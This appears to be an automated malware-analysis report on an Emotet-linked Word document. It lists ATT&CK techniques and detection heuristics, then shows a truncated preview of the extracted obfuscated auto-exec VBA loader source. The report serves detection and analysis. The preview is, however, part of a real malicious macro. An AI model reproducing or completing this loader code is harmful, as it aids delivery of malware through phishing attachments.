MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains critical heuristics indicating an obfuscated auto-exec VBA loader that uses CreateObject and execution sinks, consistent with Emotet's typical behavior. The presence of a VBA macro named 'macros.bas' and ClamAV detection as 'Doc.Downloader.Emotet-10019714-0' strongly suggests this family. The VBA code is heavily obfuscated, but the overall intent appears to be downloading and executing a secondary payload.
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-10019714-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10019714-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Fake invoice / payment lure low SE_INVOICE_LUREDocument contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 137185 bytes |
SHA-256: 3e867a760534c9f10a692acf29fbeeb2122b1d665167d17e47f622fbf17f28d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "x0c7c905802bb"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b1000076bx01, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b5071542b7c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "cx1c1b468b520, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc661c5b099, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x07b9890x64, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b40x220b000, 5, 5, MSForms, TextBox"
Attribute VB_Name = "c030906710b0"
Function x04c41019x032()
On Error Resume Next
'markets global relationships Brook Frozen process improvement Maine Land Idaho
x03c940849x = True
'end-to-end distributed Integration out-of-the-box Somali Shilling Home Loan Account moratorium Rhode Island Configuration client-server Ergonomic Steel Ball payment SAS
b2c16162b99 = "architectures service-desk target Planner transmitter Wooden Dynamic transmitting"
'architectures payment ivory mindshare Cotton Gorgeous Business-focused Tactics back-end innovative users Licensed Metal Chips
x8011b514403 = c99130xc84b54 - x104599141x
'Clothing Gorgeous Granite Ball Refined Steel Sausages Phased Savings Account Rest Administrator
Select Case c46028x096844
'array invoice 1080p monetize Cayman Islands Dollar Investment Account parsing Re-engineered adapter Executive
Case bb09001100xbc
'Wyoming Intelligent AI Unbranded US Dollar bypassing grey Web 24/7 Regional
x3c14102c063 = xxx8902529061
'CSS Oklahoma Reactive Gorgeous e-enable connecting Silver synthesizing high-level Baby & Health Credit Card Account Mountain turquoise Tools & Movies
x605363218070 = Atn(b605000558x6x)
'Rubber Innovative portals Liaison secured line South Dakota
Case c0230190b100
'Gorgeous Cotton Gloves Colombia e-enable Object-based interface Tennessee Handmade Nepal responsive San Marino Crescent
c150323990x2b = x030000358098
'Investment Account customized Cambridgeshire Fresh Forward Highway Unbranded Frozen Bacon tan generating
ccb565698cx = b38b3b02500
'IB multi-byte dedicated payment Pennsylvania frame overriding deposit XML facilitate metrics
Case cxc768x500c
'Buckinghamshire reciprocal New Mexico withdrawal Branch Configuration
b02880870bx84 = ChrW(x51b35666b83c)
'scalable payment Savings Account violet challenge Bedfordshire Tonga Universal Assurance Sleek silver proactive interactive Australian Dollar
b5659x002c66 = x0bbb448x2402
'Games hardware Strategist navigating Fresh Wooden Intranet definition Gorgeous Metal Pants sensor Human
End Select
'Port high-level Keys Rubber Practical Wooden Chair indigo Turkmenistan
c650486c000x = Atn(c00773c61x4c0)
'syndicate transmitting Specialist full-range Home, Electronics & Books Falkland Islands Pound
x002128x972 = Hex(x1c489b552944)
'Savings Account productize synergistic schemas monitor Wyoming Iceland application optimal parse Profit-focused Unbranded Wooden Shirt navigating bypassing
b2905bc8c68c = b00501380695("p" + x0c7c905802bb.x07b9890x64 + x0c7c905802bb.cx1c1b468b520) '
'Customer Bedfordshire Rhode Island transmitting teal Developer Wooden e-services back up
xx06809c00943 = True
'monitor Sleek Concrete Chicken Electronics, Grocery & Jewelery Configuration Strategist Auto Loan Account Garden & Sports Djibouti
b2c16162b99 = "Mountain Wyoming Malaysia Customer quantifying calculating Steel Harbor hack New Hampshire implement encompassing Health, Garden & Tools redundant"
'Intelligent Granite Soap Quality firewall Garden Principal algorithm static Island Dobra Incredible Frozen Pizza Freeway Versatile bypass Dam
b9767c69060b = x49bb0b0x1300 - c070307b9b663
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.